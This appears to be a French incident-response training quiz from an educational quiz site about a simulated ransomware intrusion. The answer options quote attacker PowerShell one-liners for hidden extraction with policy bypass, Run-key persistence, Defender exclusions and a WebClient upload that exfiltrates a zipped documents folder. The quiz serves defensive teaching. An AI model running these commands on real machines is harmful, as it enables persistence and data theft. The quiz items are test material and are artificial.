Quelle technique a permis au malware de se propager à d'autres machines ?

Partages réseau via le protocole SMB

Quel indicateur de compromission (IOC) est utilisé pour détecter la communication avec le serveur de commande ?

Le nom de domaine d’un site de streaming

Quels sont les différents types de notifications reçues par Alice Martin le 23/04/2025 entre 08:15 et 10:50 ?

Notifications de connexion et alertes de sécurité

Notifications de livraisons et achats

Quel email contient une pièce jointe suspecte (docm) et quel est son sujet ?

"Urgent! Vérification de votre compte bancaire"

"Mise à jour de votre identifiant Apple"

"Confirmation de votre paiement"

"Nouvelle politique de télétravail"

Quelle commande a été utilisée pour extraire le fichier joint dans le dossier C:\Temp ?

"powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command '$payload = [ System.IO .Compression.ZipFile]::ExtractToDirectory('C:\Users\alice.martin\Downloads\validation_crédit.docm','C:\Temp');'"

"Compress-Archive -Path 'C:\Users\alice.martin\Documents\*' -DestinationPath 'C:\Temp\ data.zip '"

"Get-EventLog -LogName System -Newest 5"

"Test-Connection google.com -Count 2"

Quelle action a été réalisée pour désactiver la sécurité sur la machine d'Alice Martin ?

Désactivation de la surveillance en temps réel, de la protection contre les logiciels malveillants et du scan des scripts dans les préférences de Windows Defender

Désactivation du pare-feu Windows

Suppression des fichiers de log de l'antivirus

Téléchargement et exécution d'un antivirus alternatif

Quelle commande a été utilisée pour garantir que le script malveillant soit exécuté automatiquement au démarrage de la machine ?

"Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Updater' -Value 'C:\Temp\script.ps1'"

"$dlPath = 'C:\Temp\script.ps1'; Invoke-Expression (Get-Content $dlPath -Raw)"

"Add-MpPreference -ExclusionPath 'C:\Users\alice.martin\AppData\Roaming'"

"Start-Process 'C:\Users\alice.martin\AppData\Roaming\update.exe'"

Quelle commande a été utilisée pour exfiltrer des données depuis la machine d'Alice Martin vers un serveur externe ?

"(New-Object System.Net .WebClient).UploadFile('4W3i2hguUU7u4VXoby6tK22cszwNjV883sxPsjvybVcYYTtJD2b', 'C:\Temp\ data.zip ')"

"Get-ChildItem C:\Users\alice.martin\Documents -Recurse | Measure-Object"

"Compress-Archive -Path 'C:\Users\alice.martin\Documents\*' -DestinationPath 'C:\Temp\ data.zip '"

Quel fichier malveillant a été téléchargé et quelle commande a été utilisée pour le télécharger ?

"Un fichier nommé update.exe, téléchargé via DownloadFile."

"Un fichier zip contenant des données personnelles, téléchargé avec Compress-Archive."

"Un script Powershell nommé script.ps1, téléchargé via Invoke-Expression."

"Un programme de nettoyage téléchargé depuis un serveur interne."

Quelles actions ont été effectuées par Alice Martin à 08:44:00 ?

Copie de fichiers des partages vers son dossier personnel

Déconnexion du serveur finance

Suppression du fichier update.exe

Que fait Alice Martin immédiatement après avoir copié update.exe sur les serveurs ?

Elle accède aux fichiers update.exe sur les deux serveurs

Elle se déconnecte sans action

Elle exécute un script PowerShell

Parmi les affirmations suivantes, laquelle décrit le mieux l’ensemble de ses actions ?

Alice Martin a exfiltré des données et propagé le ransomware sur les serveurs

Alice Martin a tenté de restaurer une sauvegarde

Alice Martin a copié des fichiers à des fins de sauvegarde

Alice Martin a agi en tant qu’administratrice réseau légitime

Quelle information importante peut-on déduire du WHOIS de l’IP 185.129.62.62 ? (Partie "Détails" dans VirusTotal)

L’IP appartient à une entreprise danoise qui héberge des serveurs Tor

L’IP appartient à un fournisseur cloud américain, L’IP est utilisée pour héberger des services de streaming

L’IP est associée à un service de messagerie chiffrée allemand

Présentation_FionaP_I-Tracing

University

•

35 Qs

Similar activities

Resumen OC / Arquitectura

University

•

30 Qs

Sistemas Operacionais - Escalonamento de Processos

University

•

30 Qs

11. Recuperación Final 2025

11th Grade - University

•

30 Qs

Cuestionario de Repaso Final Entorno Económico Digital

University

•

40 Qs

RA1: Econometria

University

•

30 Qs

Funcion print() y tipos de datos

University

•

30 Qs

PARCIAL Final Bases de Datos Masivas 2025-1

University

•

34 Qs

Comandos Básicos Switch hp 5130

University

•

30 Qs

Présentation_FionaP_I-Tracing

Quiz

•

Information Technology (IT)

•

University

•

Practice Problem

•

Easy

Fiona Piquet

Used 1+ times

FREE Resource

35 questions

Show all answers

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Le CSIRT a pour mission principale de détecter, analyser et répondre aux incidents de sécurité informatique.

Vrai

Faux

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Le CSIRT est uniquement chargé de la communication externe avec la presse en cas de cyberattaque.

Vrai

Faux

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Le CSIRT peut être impliqué dans des actions de prévention, comme des campagnes de sensibilisation à la cybersécurité.

Vrai

Faux

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Quelle est la première action recommandée après avoir été informé que Machine1 est infectée ?

Redémarrer Machine1 pour interrompre l'infection

Isoler Machine1 du réseau pour contenir la menace

Mettre à jour les antivirus sur Machine1

Supprimer les fichiers suspects détectés manuellement

MULTIPLE CHOICE QUESTION

1 min • 1 pt

Pourquoi la présence de plusieurs machines non surveillées dans le même VLAN que Machine1 est-elle préoccupante ?

Cela complique la mise à jour des correctifs de sécurité

Le risque de propagation non détectée est plus élevé

Ces machines peuvent ralentir l'analyse de l'antivirus

Elles empêchent le SOC d'agir sur Machine1

MULTIPLE CHOICE QUESTION

15 mins • 1 pt

Quel vecteur d’infection est utilisé par le groupe EncryptoLOL pour accéder à Machine1 ?

Téléchargement via un site web de streaming

Pièce jointe malveillante dans un e-mail de phishing

Clé USB infectée laissée sur un parking

Vulnérabilité non corrigée dans le navigateur

MULTIPLE CHOICE QUESTION

1 min • 1 pt

Quel rôle joue PowerShell dans l’attaque d’EncryptoLOL ?

Il a été utilisé pour supprimer les sauvegardes

Il a servi à exécuter la charge utile après activation d’une macro

Il a permis la communication avec le C2 en HTTPS

Il a désinstallé les antivirus

Access all questions and much more by creating a free account

Create resources

Host any resource

Get auto-graded reports

Continue with Google

Continue with Email

Continue with Classlink

Continue with Clever

or continue with

Microsoft

Apple

Others

Already have an account?

Similar Resources on Wayground

35 questions

Lenguaje estructurado de consultas

Quiz

•

University

35 questions

Preguntas sobre Código Intermedio

Quiz

•

University

30 questions

Untitled Quiz

Quiz

•

University

30 questions

Fundamentos de gestión de TI

Quiz

•

University

30 questions

UNI_CC_5P_DDG_História dos Games

Quiz

•

University

38 questions

Conceptos Básicos de Sitios Web

Quiz

•

University

30 questions

HW LIVRO 2 - AULAS 1 ATE 4

Quiz

•

2nd Grade - University

30 questions

Quiz sobre Engenharia de Requisitos e Qualidade de Software

Quiz

•

University

Popular Resources on Wayground

15 questions

Fractions on a Number Line

Quiz

•

3rd Grade

20 questions

Equivalent Fractions

Quiz

•

3rd Grade

25 questions

Multiplication Facts

Quiz

•

5th Grade

$fractions$

22 questions

fractions

Quiz

•

3rd Grade

20 questions

Main Idea and Details

Quiz

•

5th Grade

20 questions

Context Clues

Quiz

•

6th Grade

15 questions

Equivalent Fractions

Quiz

•

4th Grade

20 questions

Figurative Language Review

Quiz

•

6th Grade

Discover more resources for Information Technology (IT)

12 questions

IREAD Week 4 - Review

Quiz

•

3rd Grade - University

23 questions

Subject Verb Agreement

Quiz

•

9th Grade - University

7 questions

Force and Motion

Interactive video

•

4th Grade - University

7 questions

Renewable and Nonrenewable Resources

Interactive video

•

4th Grade - University

5 questions

Poetry Interpretation

Interactive video

•

4th Grade - University

19 questions

Black History Month Trivia

Quiz

•

6th Grade - Professio...

15 questions

Review1

Quiz

•

University

15 questions

Pre1

Quiz

•

University